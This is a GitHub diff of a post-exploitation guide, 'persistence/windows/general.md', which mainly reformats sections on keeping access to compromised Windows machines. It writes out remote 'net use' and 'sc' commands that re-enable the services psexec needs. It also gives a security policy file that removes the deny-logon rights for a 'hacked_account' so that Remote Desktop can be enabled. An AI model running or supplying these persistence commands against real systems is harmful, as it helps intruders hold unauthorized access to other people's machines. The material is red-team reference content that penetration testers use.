You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: persistence/windows/general.md
+27-18Lines changed: 27 additions & 18 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -15,23 +15,23 @@ Commands to run to maintain persistence after you have exploited it and are usua
15
15
16
16
17
17
### Enable `psexec`
18
-
*The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
19
-
20
-
`` c:\> net use \\target\ipc$ username /user:password
21
-
c:\> sc \\target config netdde start= auto
22
-
c:\> sc \\target config netddedsdm start= auto
23
-
c:\> sc \\target config clipsrv start= auto
24
-
c:\> sc \\target start netdde
25
-
c:\> sc \\target start netddedsdm
26
-
c:\> sc \\target start clipsrv
27
-
``
18
+
The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
19
+
20
+
``c:\> net use \\target\ipc$ username /user:password
21
+
c:\> sc \\target config netdde start= auto
22
+
c:\> sc \\target config netddedsdm start= auto
23
+
c:\> sc \\target config clipsrv start= auto
24
+
c:\> sc \\target start netdde
25
+
c:\> sc \\target start netddedsdm
26
+
c:\> sc \\target start clipsrv
27
+
``
28
28
29
29
### Enable Remote Desktop
30
-
*Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
30
+
Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
31
31
32
-
1.Create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
32
+
1.On the compromised system, create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
33
33
34
-
<pre>
34
+
<pre>
35
35
[Unicode]
36
36
Unicode=yes
37
37
[Version]
@@ -43,16 +43,25 @@ Commands to run to maintain persistence after you have exploited it and are usua
43
43
sedenyinteractivelogonright =
44
44
sedenyremoteinteractivelogonright =
45
45
sedenynetworklogonright =
46
-
</pre>
46
+
</pre>
47
47
48
-
1. Create another file named `enable_ts.reg` containing the contents below.
48
+
1. Create another file named `enable_ts.reg` containing the contents below.
0 commit comments